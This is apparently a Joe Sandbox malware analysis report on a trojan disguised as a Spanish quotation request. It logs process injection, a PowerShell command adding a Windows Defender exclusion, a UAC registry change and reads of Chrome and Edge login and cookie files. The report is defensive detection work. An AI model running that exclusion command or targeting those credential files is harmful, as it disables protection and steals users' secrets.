            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, -------.cs Reference to suspicious API methods: LoadLibrary(_0600_FD48_06DC_060F(_FBBD_FBC0_FD90_FDD0._FBB3_0614))
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, -------.cs Reference to suspicious API methods: GetProcAddress(intPtr, _0600_FD48_06DC_060F(_FBBD_FBC0_FD90_FDD0._060A_FDE9_FBB9_FDFF_FBC1))
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, -------.cs Reference to suspicious API methods: VirtualProtect(procAddress, (uint)array.Length, 64u, out var _FDD1_065A_065F_FD43_0609_FBCF_FDC8)
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtOpenKeyEx: Direct from: 0x77672B9C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtProtectVirtualMemory: Direct from: 0x77672F9C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtCreateFile: Direct from: 0x77672FEC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtOpenFile: Direct from: 0x77672DCC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtTerminateThread: Direct from: 0x77672FCC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtProtectVirtualMemory: Direct from: 0x77667B2E
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtQueryInformationToken: Direct from: 0x77672CAC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtAllocateVirtualMemory: Direct from: 0x77672BEC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtDeviceIoControlFile: Direct from: 0x77672AEC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtQuerySystemInformation: Direct from: 0x776748CC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtQueryAttributesFile: Direct from: 0x77672E6C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtSetInformationThread: Direct from: 0x77672B4C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtOpenSection: Direct from: 0x77672E0C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtQueryVolumeInformationFile: Direct from: 0x77672F2C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtAllocateVirtualMemory: Direct from: 0x776748EC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtSetInformationThread: Direct from: 0x776663F9
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtReadVirtualMemory: Direct from: 0x77672E8C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtCreateKey: Direct from: 0x77672C6C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtClose: Direct from: 0x77672B6C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtWriteVirtualMemory: Direct from: 0x7767490C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtAllocateVirtualMemory: Direct from: 0x77673C9C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtDelayExecution: Direct from: 0x77672DDC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtCreateUserProcess: Direct from: 0x7767371C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtQuerySystemInformation: Direct from: 0x77672DFC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtQueryInformationProcess: Direct from: 0x77672C26
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtResumeThread: Direct from: 0x77672FBC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtReadFile: Direct from: 0x77672ADC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe NtAllocateVirtualMemory: Direct from: 0x77672BFC
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Windows\SysWOW64\SecEdit.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeThread register set: target process: 7240Jump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeThread APC queued: target process: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2FE5008Jump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3792078303.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1468162563.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000000.1610181237.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3792078303.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1468162563.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000000.1610181237.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3792078303.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1468162563.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000000.1610181237.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3792078303.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1468162563.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000000.1610181237.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeQueries volume information: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            Source: Yara matchFile source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            Source: Yara matchFile source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            11
            Registry Run Keys / Startup Folder
            512
            Process Injection
            1
            Masquerading
            1
            OS Credential Dumping
            1
            Query Registry
            Remote Services1
            Email Collection
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            21
            Disable or Modify Tools
            LSASS Memory231
            Security Software Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Registry Run Keys / Startup Folder
            41
            Virtualization/Sandbox Evasion
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading
            512
            Process Injection
            NTDS41
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism
            Cached Domain Credentials2
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSync113
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Rundll32
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            [Behavior graph] Behavior Graph ID: 1509644; Sample: z27PEDIDOSDECOTIZACI__N___s...; Startdate: 11/09/2024; Architecture: WINDOWS; Score: 100

            Source | Detection | Scanner | Label | Link
            z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | 37% | ReversingLabs | Win32.Trojan.Generic |
            z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | 100% | Avira | TR/AD.Swotter.ecpvo |
            z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            NameIPActiveMaliciousAntivirus DetectionReputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1509644
Start date and time: 2024-09-11 22:01:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
